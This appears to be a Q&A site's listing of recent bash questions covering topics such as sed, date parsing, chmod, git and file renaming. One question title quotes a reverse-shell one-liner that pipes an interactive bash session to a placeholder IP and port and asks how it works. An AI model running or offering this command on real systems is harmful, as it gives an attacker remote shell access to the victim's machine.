Logo Questions Linux Laravel Mysql Ubuntu Git Menu
 

New posts in bash

What is the meaning of `find /someDir/* -exec rm {} \`?

bash shell unix find exec

Bash File Modified Alert for Raspbery Pi on Raspbian

Can someone explain how does this command works? bash -i >& /dev/tcp/"IP"/"PORT" 0>&1

linux bash

How/why is `date` detecting multiple timezone parts for input format `yyyymmddThhmmssZ`

bash date datetime timezone

Trim file names to leave only last 5 characters

bash terminal

How do I create a folder named from part of filename before first uppercase character and move corresponding files into the new directory

regex bash tcl

Why does git-pull fail with signal 13?

git bash shell git-pull

Automated Installation of R-Studio Using Shell Script

linux r bash shell rstudio

Format all XML files in a directory and save them in a subdirectory

bash find xargs xmllint

Print lines indexed by a second file

bash awk sed

What is used by bash to open/execute argv[0]?

c linux bash shell

Length of a sequence of numbers using seq in shell

bash shell seq

How can I remove double line breaks with sed?

linux bash sed

How can I do case-insensitive string comparison in Bash? [duplicate]

bash shell

How can I write C++ crash errors in a file? [duplicate]

c++ c linux bash shell

chmod 777 -R on existing path getting chmod: -R: No such file or directory

bash macos permissions chmod

How to get the modified date and year of file in Unix? [duplicate]

bash unix

How to set umask default for an user?

linux bash umask

Failed to launch git bash

bash git vs-code

Jump to a word in a command in Bash

bash